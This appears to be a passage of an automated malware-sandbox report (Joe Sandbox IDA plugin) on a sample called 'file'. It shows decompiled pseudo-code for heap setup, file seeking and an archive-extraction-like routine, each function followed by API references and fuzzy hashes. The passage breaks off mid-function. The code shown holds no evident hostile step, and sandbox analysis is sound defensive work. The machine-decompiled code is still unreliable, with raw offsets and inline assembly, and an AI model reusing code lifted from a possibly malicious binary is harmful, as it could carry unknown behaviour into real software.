                              			E004051C8(void* __ecx, intOrPtr* __edx, void* __eflags) {
                              				void* _t17;
                              				void* _t20;
                              				void* _t21;
                              				void* _t24;
                              				long _t27;
                              				void* _t31;
                              				void* _t41;
                              				intOrPtr* _t44;
                              				void* _t46;
                              
                              				_t51 = __eflags;
                              				_t39 = __edx;
                              				E00413954(E0041965C, _t46);
                              				_t41 = __ecx;
                              				_t44 = __edx;
                              				E00405268(_t46 - 0x1c);
                              				while(1) {
                              					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                              					_push(_t44);
                              					_push(_t41);
                              					_t17 = E0040511B(_t46 - 0x1c, _t39, _t51); // executed
                              					_t31 = _t46 - 0x1c;
                              					if(_t17 == 0) {
                              						break;
                              					}
                              					_t21 = E004051A4(_t31);
                              					_t53 = _t21;
                              					if(_t21 == 0) {
                              						_t31 = _t46 - 0x1c;
                              						break;
                              					} else {
                              						 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
                              						E004051A4(_t46 - 0x1c);
                              						E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
                              						_t24 = E004058CD( *_t44, _t39, _t53); // executed
                              						if(_t24 != 0) {
                              							L6:
                              							E00405268(_t46 - 0x1c);
                              							continue;
                              						} else {
                              							if(E0040498D( *_t44) != 0) {
                              								_t20 = 1;
                              							} else {
                              								_t27 = GetLastError();
                              								_t51 = _t27 - 0xb7;
                              								if(_t27 != 0xb7) {
                              									L9:
                              									_t20 = 0;
                              									__eflags = 0;
                              								} else {
                              									goto L6;
                              								}
                              							}
                              						}
                              					}
                              					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                              					return _t20;
                              				}
                              				E004051A4(_t31);
                              				E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
                              				goto L9;
                              			}













                              APIs
                              • __EH_prolog.LIBCMT ref: 004051CD
                                • Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120
                                • Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2
                              • GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID:
                              • API String ID: 2901101390-0
                              • Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
                              • Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004159F8(void* __ecx, intOrPtr _a4) {
                              				void* _t6;
                              				intOrPtr _t8;
                              				void* _t9;
                              				void* _t10;
                              				void* _t12;
                              
                              				_t12 = __ecx;
                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                              				_t15 = _t6;
                              				 *0x425a34 = _t6;
                              				if(_t6 == 0) {
                              					L7:
                              					return 0;
                              				} else {
                              					_t8 = E004158B0(_t12, _t15);
                              					 *0x425a38 = _t8;
                              					if(_t8 != 3) {
                              						__eflags = _t8 - 2;
                              						if(_t8 != 2) {
                              							goto L8;
                              						} else {
                              							_t10 = E0041659C();
                              							goto L5;
                              						}
                              					} else {
                              						_t10 = E00415A55(0x3f8);
                              						L5:
                              						if(_t10 != 0) {
                              							L8:
                              							_t9 = 1;
                              							return _t9;
                              						} else {
                              							HeapDestroy( *0x425a34);
                              							goto L7;
                              						}
                              					}
                              				}
                              			}









                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF
                              • HeapDestroy.KERNEL32 ref: 00415A48
                                • Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$AllocCreateDestroyVersion
                              • String ID:
                              • API String ID: 2507506473-0
                              • Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
                              • Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E00405ACE(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
                              				long _v8;
                              				long _v12;
                              				long _t12;
                              				long _t13;
                              				long* _t14;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t12 = _a4;
                              				_v8 = _a8;
                              				_v12 = _t12;
                              				_t13 = SetFilePointer( *__ecx, _t12,  &_v8, _a12); // executed
                              				_v12 = _t13;
                              				if(_t13 != 0xffffffff || GetLastError() == 0) {
                              					_t14 = _a16;
                              					 *_t14 = _v12;
                              					_t14[1] = _v8;
                              					return 1;
                              				} else {
                              					return 0;
                              				}
                              			}









                              APIs
                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
                              • GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer
                              • String ID:
                              • API String ID: 2976181284-0
                              • Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
                              • Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E0040BBC9(signed char __edx) {
                              				signed int _t287;
                              				signed char _t289;
                              				signed int _t291;
                              				signed char _t292;
                              				signed char _t295;
                              				signed char _t305;
                              				intOrPtr _t307;
                              				signed char _t308;
                              				signed char _t314;
                              				intOrPtr _t315;
                              				signed char _t323;
                              				signed char _t325;
                              				signed char _t329;
                              				signed char _t330;
                              				signed char _t334;
                              				signed char _t335;
                              				signed char _t340;
                              				signed char _t345;
                              				signed char _t349;
                              				signed char _t351;
                              				signed char _t352;
                              				signed char _t356;
                              				signed char _t368;
                              				signed char _t372;
                              				signed int _t380;
                              				intOrPtr _t388;
                              				intOrPtr _t397;
                              				signed char _t401;
                              				signed char _t407;
                              				signed char _t408;
                              				intOrPtr _t410;
                              				intOrPtr _t475;
                              				signed char _t485;
                              				signed int _t488;
                              				signed char _t489;
                              				intOrPtr* _t490;
                              				signed int _t492;
                              				intOrPtr _t498;
                              				signed int _t501;
                              				signed int _t502;
                              				void* _t503;
                              				signed char _t506;
                              				signed int _t508;
                              				intOrPtr _t509;
                              				void* _t510;
                              				void* _t512;
                              
                              				_t485 = __edx;
                              				_t287 = E00413954(E0041A262, _t510);
                              				_t407 = 0;
                              				 *(_t510 - 4) = 0;
                              				 *((char*)(_t510 - 0x4c)) = _t287 & 0xffffff00 |  *(_t510 + 0x14) != 0x00000000;
                              				_t289 =  *(_t510 + 0x18);
                              				 *((intOrPtr*)(_t510 - 0x10)) = _t512 - 0x124;
                              				 *(_t510 + 0x18) = _t289;
                              				if(_t289 != 0) {
                              					 *((intOrPtr*)( *_t289 + 4))(_t289);
                              				}
                              				 *(_t510 - 4) = 1;
                              				 *(_t510 - 0x1c) = _t407;
                              				 *(_t510 - 0x18) = _t407;
                              				 *((char*)(_t510 + 0x17)) =  *(_t510 + 0x10) == 0xffffffff;
                              				if( *((char*)(_t510 + 0x17)) != 0) {
                              					 *(_t510 + 0x10) =  *( *(_t510 + 8) + 0x7c);
                              				}
                              				if( *(_t510 + 0x10) != _t407) {
                              					E00402155(_t510 - 0x30);
                              					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              					_t291 = 0;
                              					__eflags = 0;
                              					 *(_t510 - 4) = 2;
                              					 *(_t510 - 0x34) = 0;
                              					while(1) {
                              						__eflags = _t291 -  *(_t510 + 0x10);
                              						if(_t291 >=  *(_t510 + 0x10)) {
                              							break;
                              						}
                              						__eflags =  *((char*)(_t510 + 0x17));
                              						if( *((char*)(_t510 + 0x17)) == 0) {
                              							_t291 =  *( *(_t510 + 0xc) + _t291 * 4);
                              						}
                              						_t496 =  *(_t510 + 8);
                              						 *(_t510 - 0x38) = _t291;
                              						_t508 =  *( *((intOrPtr*)( *(_t510 + 8) + 0x1c8)) + _t291 * 4);
                              						__eflags = _t508 - 0xffffffff;
                              						if(_t508 != 0xffffffff) {
                              							_t380 =  *(_t510 - 0x28);
                              							__eflags = _t380 - _t407;
                              							if(_t380 == _t407) {
                              								L16:
                              								 *(_t510 - 0x7c) =  *(_t510 - 0x7c) | 0xffffffff;
                              								 *(_t510 - 0x78) = _t508;
                              								E0040C3F8(_t510 - 0x74);
                              								 *(_t510 - 0x5c) = _t407;
                              								 *(_t510 - 0x58) = _t407;
                              								_push(_t510 - 0x7c);
                              								 *(_t510 - 4) = 5;
                              								E0040C46D(_t510 - 0x30);
                              								 *(_t510 - 4) = 2;
                              								E004042AD(_t510 - 0x74);
                              								_t475 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t496 + 0x58)) + _t508 * 4)));
                              								_t67 = _t510 - 0x1c;
                              								 *_t67 =  *(_t510 - 0x1c) + _t475;
                              								__eflags =  *_t67;
                              								_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
                              								asm("adc [ebp-0x18], edx");
                              								 *((intOrPtr*)(_t388 + 0x20)) = _t475;
                              								 *(_t388 + 0x24) = _t485;
                              								L17:
                              								_t498 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
                              								_t410 =  *((intOrPtr*)( *((intOrPtr*)( *(_t510 + 8) + 0x1b4)) + _t508 * 4));
                              								_t509 =  *((intOrPtr*)(_t498 + 0x10));
                              								while(1) {
                              									_t393 =  *(_t510 - 0x38) - _t410;
                              									__eflags = _t509 -  *(_t510 - 0x38) - _t410;
                              									if(_t509 >  *(_t510 - 0x38) - _t410) {
                              										goto L13;
                              									}
                              									_t87 = _t498 + 8; // 0xa
                              									E0040C413(_t87, _t393 & 0xffffff00 | __eflags == 0x00000000);
                              									_t509 = _t509 + 1;
                              								}
                              								goto L13;
                              							}
                              							_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t380 * 4 - 4));
                              							__eflags = _t508 -  *((intOrPtr*)(_t397 + 4));
                              							if(_t508 ==  *((intOrPtr*)(_t397 + 4))) {
                              								goto L17;
                              							}
                              							goto L16;
                              						} else {
                              							_push(_t508);
                              							_push(_t291);
                              							_push(E0040C30E(_t510 - 0x130));
                              							 *(_t510 - 4) = 3;
                              							E0040C46D(_t510 - 0x30);
                              							 *(_t510 - 4) = 2;
                              							E004042AD(_t510 - 0x128);
                              							L13:
                              							_t291 =  *(_t510 - 0x34) + 1;
                              							_t407 = 0;
                              							 *(_t510 - 0x34) = _t291;
                              							continue;
                              						}
                              					}
                              					_t292 =  *(_t510 + 0x18);
                              					__eflags =  *((intOrPtr*)( *_t292 + 0xc))(_t292,  *(_t510 - 0x1c),  *(_t510 - 0x18)) - _t407;
                              					if(__eflags == 0) {
                              						E0040AC6A(_t510 - 0x108, __eflags, 1);
                              						_push(0x38);
                              						 *(_t510 - 4) = 7;
                              						 *(_t510 - 0x40) = _t407;
                              						 *(_t510 - 0x3c) = _t407;
                              						 *(_t510 - 0x1c) = _t407;
                              						 *(_t510 - 0x18) = _t407;
                              						_t295 = E00403A76();
                              						 *(_t510 + 0x10) = _t295;
                              						__eflags = _t295 - _t407;
                              						 *(_t510 - 4) = 8;
                              						if(_t295 == _t407) {
                              							_t501 = 0;
                              							__eflags = 0;
                              						} else {
                              							_t501 = E004072A1(_t295);
                              						}
                              						_t488 = _t501;
                              						__eflags = _t501 - _t407;
                              						 *(_t510 - 4) = 7;
                              						 *(_t510 - 0x38) = _t488;
                              						 *(_t510 - 0x14) = _t501;
                              						if(_t501 != _t407) {
                              							 *((intOrPtr*)( *_t501 + 4))(_t501);
                              						}
                              						_push(_t407);
                              						 *(_t510 - 4) = 9;
                              						E00407334(_t501,  *(_t510 + 0x18));
                              						_t502 = 0;
                              						__eflags = 0;
                              						 *(_t510 + 0x14) = 0;
                              						while(1) {
                              							 *(_t488 + 0x28) =  *(_t510 - 0x1c);
                              							 *(_t488 + 0x2c) =  *(_t510 - 0x18);
                              							 *(_t488 + 0x20) =  *(_t510 - 0x40);
                              							 *(_t488 + 0x24) =  *(_t510 - 0x3c);
                              							_t489 = E00407410(_t488);
                              							__eflags = _t489 - _t407;
                              							if(_t489 != _t407) {
                              								break;
                              							}
                              							__eflags = _t502 -  *(_t510 - 0x28);
                              							if(_t502 <  *(_t510 - 0x28)) {
                              								_push(0x38);
                              								 *(_t510 - 0x48) = _t407;
                              								 *(_t510 - 0x44) = _t407;
                              								_t490 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t502 * 4));
                              								 *((intOrPtr*)(_t510 - 0x54)) =  *((intOrPtr*)(_t490 + 0x20));
                              								 *((intOrPtr*)(_t510 - 0x50)) =  *((intOrPtr*)(_t490 + 0x24));
                              								_t305 = E00403A76();
                              								 *(_t510 + 0xc) = _t305;
                              								__eflags = _t305 - _t407;
                              								 *(_t510 - 4) = 0xb;
                              								if(_t305 == _t407) {
                              									_t408 = 0;
                              									__eflags = 0;
                              								} else {
                              									_t408 = E0040C5E8(_t305);
                              								}
                              								__eflags = _t408;
                              								 *(_t510 - 0x34) = _t408;
                              								 *(_t510 - 4) = 9;
                              								 *(_t510 + 0x10) = _t408;
                              								if(_t408 != 0) {
                              									 *((intOrPtr*)( *_t408 + 4))(_t408);
                              								}
                              								 *(_t510 - 4) = 0xc;
                              								_t503 =  *(_t510 + 8) + 0x10;
                              								_t307 =  *_t490;
                              								__eflags = _t307 - 0xffffffff;
                              								if(_t307 == 0xffffffff) {
                              									_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x1a4)) +  *(_t490 + 4) * 4));
                              								}
                              								__eflags =  *( *(_t510 + 8) + 0x1e0);
                              								_t173 = _t490 + 8; // 0x8
                              								_t308 = E0040C73A(_t408, _t503, 0, _t307, _t173,  *(_t510 + 0x18),  *((intOrPtr*)(_t510 - 0x4c)),  *(_t510 + 8) & 0xffffff00 |  *( *(_t510 + 8) + 0x1e0) != 0x00000000); // executed
                              								__eflags = _t308;
                              								 *(_t510 + 0xc) = _t308;
                              								if(_t308 == 0) {
                              									__eflags =  *_t490 - 0xffffffff;
                              									if( *_t490 == 0xffffffff) {
                              										_t492 =  *(_t490 + 4) << 2;
                              										 *(_t510 + 0xc) =  *( *((intOrPtr*)(_t503 + 0x48)) + _t492);
                              										 *(_t510 - 0x48) = E0040C2CD(_t503,  *(_t490 + 4));
                              										 *(_t510 - 0x44) = _t485;
                              										 *(_t510 - 4) = 0xe;
                              										_t485 =  *( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3) + 4);
                              										asm("adc edx, [esi+0x14c]");
                              										_t314 = E0040AD19(_t510 - 0x108, __eflags,  *((intOrPtr*)( *(_t510 + 8) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3))) +  *((intOrPtr*)(_t503 + 0x148)), _t485,  *((intOrPtr*)(_t503 + 0xc)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3),  *(_t510 + 0xc),  *(_t510 + 0x10),  *(_t510 - 0x14)); // executed
                              										_t506 = _t314;
                              										__eflags = _t506 - 1;
                              										if(_t506 != 1) {
                              											__eflags = _t506 - 0x80004001;
                              											if(_t506 != 0x80004001) {
                              												__eflags = _t506;
                              												if(_t506 == 0) {
                              													_t315 =  *((intOrPtr*)(_t408 + 0x18));
                              													__eflags =  *((intOrPtr*)(_t408 + 0x28)) -  *((intOrPtr*)(_t315 + 8));
                              													if( *((intOrPtr*)(_t408 + 0x28)) ==  *((intOrPtr*)(_t315 + 8))) {
                              														 *(_t510 - 4) = 9;
                              														E00403800(_t510 + 0x10);
                              														L91:
                              														 *(_t510 + 0x14) =  *(_t510 + 0x14) + 1;
                              														 *(_t510 - 0x1c) =  *(_t510 - 0x1c) +  *((intOrPtr*)(_t510 - 0x54));
                              														_t488 =  *(_t510 - 0x38);
                              														_t502 =  *(_t510 + 0x14);
                              														asm("adc [ebp-0x18], eax");
                              														 *(_t510 - 0x40) =  *(_t510 - 0x40) +  *(_t510 - 0x48);
                              														asm("adc [ebp-0x3c], eax");
                              														_t407 = 0;
                              														continue;
                              													}
                              													_t506 = E0040CA4C(_t408, _t510, 2);
                              													_t323 =  *(_t510 + 0x10);
                              													__eflags = _t506;
                              													 *(_t510 - 4) = 9;
                              													if(_t506 == 0) {
                              														L86:
                              														__eflags = _t323;
                              														if(_t323 != 0) {
                              															 *((intOrPtr*)( *_t323 + 8))(_t323);
                              														}
                              														 *(_t510 - 4) = 9;
                              														goto L91;
                              													}
                              													__eflags = _t323;
                              													if(_t323 != 0) {
                              														 *((intOrPtr*)( *_t323 + 8))(_t323);
                              													}
                              													_t325 =  *(_t510 - 0x14);
                              													 *(_t510 - 4) = 7;
                              													__eflags = _t325;
                              													if(__eflags != 0) {
                              														 *((intOrPtr*)( *_t325 + 8))(_t325);
                              													}
                              													 *(_t510 - 4) = 2;
                              													E0040C380(_t510 - 0x108, __eflags);
                              													 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              													 *(_t510 - 4) = 0x12;
                              													L82:
                              													E004042D6();
                              													 *(_t510 - 4) = 1;
                              													E004042AD(_t510 - 0x30);
                              													_t329 =  *(_t510 + 0x18);
                              													 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              													__eflags = _t329;
                              													L83:
                              													if(__eflags != 0) {
                              														 *((intOrPtr*)( *_t329 + 8))(_t329);
                              													}
                              													_t330 = _t506;
                              													goto L92;
                              												}
                              												_t334 =  *(_t510 + 0x10);
                              												 *(_t510 - 4) = 9;
                              												__eflags = _t334;
                              												if(_t334 != 0) {
                              													 *((intOrPtr*)( *_t334 + 8))(_t334);
                              												}
                              												_t335 =  *(_t510 - 0x14);
                              												 *(_t510 - 4) = 7;
                              												__eflags = _t335;
                              												if(__eflags != 0) {
                              													 *((intOrPtr*)( *_t335 + 8))(_t335);
                              												}
                              												 *(_t510 - 4) = 2;
                              												E0040C380(_t510 - 0x108, __eflags);
                              												 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              												 *(_t510 - 4) = 0x11;
                              												goto L82;
                              											}
                              											_t506 = E0040CA4C(_t408, _t510, 1);
                              											_t323 =  *(_t510 + 0x10);
                              											__eflags = _t506;
                              											 *(_t510 - 4) = 9;
                              											if(_t506 == 0) {
                              												goto L86;
                              											}
                              											__eflags = _t323;
                              											if(_t323 != 0) {
                              												 *((intOrPtr*)( *_t323 + 8))(_t323);
                              											}
                              											_t340 =  *(_t510 - 0x14);
                              											 *(_t510 - 4) = 7;
                              											__eflags = _t340;
                              											if(__eflags != 0) {
                              												 *((intOrPtr*)( *_t340 + 8))(_t340);
                              											}
                              											 *(_t510 - 4) = 2;
                              											E0040C380(_t510 - 0x108, __eflags);
                              											 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              											 *(_t510 - 4) = 0x10;
                              											goto L82;
                              										}
                              										_t506 = E0040CA4C(_t408, _t510, 2);
                              										_t323 =  *(_t510 + 0x10);
                              										__eflags = _t506;
                              										 *(_t510 - 4) = 9;
                              										if(_t506 == 0) {
                              											goto L86;
                              										}
                              										__eflags = _t323;
                              										if(_t323 != 0) {
                              											 *((intOrPtr*)( *_t323 + 8))(_t323);
                              										}
                              										_t345 =  *(_t510 - 0x14);
                              										 *(_t510 - 4) = 7;
                              										__eflags = _t345;
                              										if(__eflags != 0) {
                              											 *((intOrPtr*)( *_t345 + 8))(_t345);
                              										}
                              										 *(_t510 - 4) = 2;
                              										E0040C380(_t510 - 0x108, __eflags);
                              										 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              										 *(_t510 - 4) = 0xf;
                              										goto L82;
                              									}
                              									_t349 =  *(_t510 + 0x10);
                              									 *(_t510 - 4) = 9;
                              									__eflags = _t349;
                              									if(_t349 != 0) {
                              										 *((intOrPtr*)( *_t349 + 8))(_t349);
                              									}
                              									goto L91;
                              								} else {
                              									_t351 =  *(_t510 + 0x10);
                              									 *(_t510 - 4) = 9;
                              									__eflags = _t351;
                              									if(_t351 != 0) {
                              										 *((intOrPtr*)( *_t351 + 8))(_t351);
                              									}
                              									_t352 =  *(_t510 - 0x14);
                              									 *(_t510 - 4) = 7;
                              									__eflags = _t352;
                              									if(__eflags != 0) {
                              										 *((intOrPtr*)( *_t352 + 8))(_t352);
                              									}
                              									 *(_t510 - 4) = 2;
                              									E0040C380(_t510 - 0x108, __eflags);
                              									 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              									 *(_t510 - 4) = 0xd;
                              									E004042D6();
                              									 *(_t510 - 4) = 1;
                              									E004042AD(_t510 - 0x30);
                              									_t356 =  *(_t510 + 0x18);
                              									 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              									__eflags = _t356;
                              									if(_t356 != 0) {
                              										 *((intOrPtr*)( *_t356 + 8))(_t356);
                              									}
                              									_t330 =  *(_t510 + 0xc);
                              									goto L92;
                              								}
                              							}
                              							 *(_t510 - 4) = 7;
                              							E00403800(_t510 - 0x14);
                              							 *(_t510 - 4) = 2;
                              							E0040C380(_t510 - 0x108, __eflags); // executed
                              							 *(_t510 - 4) = 1;
                              							E0040C435(_t510 - 0x30);
                              							_t144 = _t510 - 4;
                              							 *_t144 =  *(_t510 - 4) & 0x00000000;
                              							__eflags =  *_t144;
                              							E00403800(_t510 + 0x18);
                              							goto L36;
                              						}
                              						_t368 =  *(_t510 - 0x14);
                              						 *(_t510 - 4) = 7;
                              						__eflags = _t368 - _t407;
                              						if(__eflags != 0) {
                              							 *((intOrPtr*)( *_t368 + 8))(_t368);
                              						}
                              						 *(_t510 - 4) = 2;
                              						E0040C380(_t510 - 0x108, __eflags);
                              						 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              						 *(_t510 - 4) = 0xa;
                              						E004042D6();
                              						 *(_t510 - 4) = 1;
                              						E004042AD(_t510 - 0x30);
                              						_t372 =  *(_t510 + 0x18);
                              						 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              						__eflags = _t372 - _t407;
                              						if(_t372 != _t407) {
                              							 *((intOrPtr*)( *_t372 + 8))(_t372);
                              						}
                              						_t330 = _t489;
                              						goto L92;
                              					}
                              					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              					 *(_t510 - 4) = 6;
                              					E004042D6();
                              					 *(_t510 - 4) = 1;
                              					E004042AD(_t510 - 0x30);
                              					_t329 =  *(_t510 + 0x18);
                              					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              					__eflags = _t329 - _t407;
                              					goto L83;
                              				} else {
                              					_t401 =  *(_t510 + 0x18);
                              					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              					if(_t401 != _t407) {
                              						 *((intOrPtr*)( *_t401 + 8))(_t401);
                              					}
                              					L36:
                              					_t330 = 0;
                              					L92:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t510 - 0xc));
                              					return _t330;
                              				}
                              			}


                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
                              • Opcode Fuzzy Hash: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0040280D() {
                              				void* __ebx;
                              				intOrPtr* _t185;
                              				intOrPtr* _t186;
                              				signed int _t187;
                              				signed int _t195;
                              				intOrPtr* _t196;
                              				signed int _t197;
                              				intOrPtr _t198;
                              				intOrPtr* _t199;
                              				intOrPtr* _t204;
                              				intOrPtr* _t207;
                              				signed int _t208;
                              				signed int _t209;
                              				FILETIME* _t217;
                              				signed int _t226;
                              				signed int _t227;
                              				FILETIME* _t228;
                              				FILETIME* _t244;
                              				signed int _t270;
                              				intOrPtr _t289;
                              				WCHAR* _t315;
                              				signed int _t338;
                              				signed int _t340;
                              				signed int _t342;
                              				intOrPtr _t344;
                              				intOrPtr* _t346;
                              				signed int _t347;
                              				void* _t348;
                              
                              				E00413954(E0041921B, _t348);
                              				_t344 =  *((intOrPtr*)(_t348 + 8));
                              				if(E00402D80(_t344 + 0xa8) == 0) {
                              					_t185 =  *((intOrPtr*)(_t344 + 0x4c));
                              					_t270 = 0;
                              					__eflags = _t185;
                              					if(_t185 != 0) {
                              						 *((intOrPtr*)( *_t185 + 8))(_t185);
                              						 *((intOrPtr*)(_t344 + 0x4c)) = 0;
                              					}
                              					 *(_t348 - 0x58) = _t270;
                              					 *(_t348 - 0x56) = _t270;
                              					_t186 =  *((intOrPtr*)(_t344 + 0xc));
                              					_t338 =  *(_t348 + 0xc);
                              					 *(_t348 - 4) = _t270;
                              					_t187 =  *((intOrPtr*)( *_t186 + 0x18))(_t186, _t338, 3, _t348 - 0x58);
                              					__eflags = _t187 - _t270;
                              					if(_t187 == _t270) {
                              						 *(_t348 - 0x18) = _t270;
                              						 *(_t348 - 0x14) = _t270;
                              						 *(_t348 - 0x10) = _t270;
                              						E00402170(_t348 - 0x18, 3);
                              						__eflags =  *(_t348 - 0x58) - _t270;
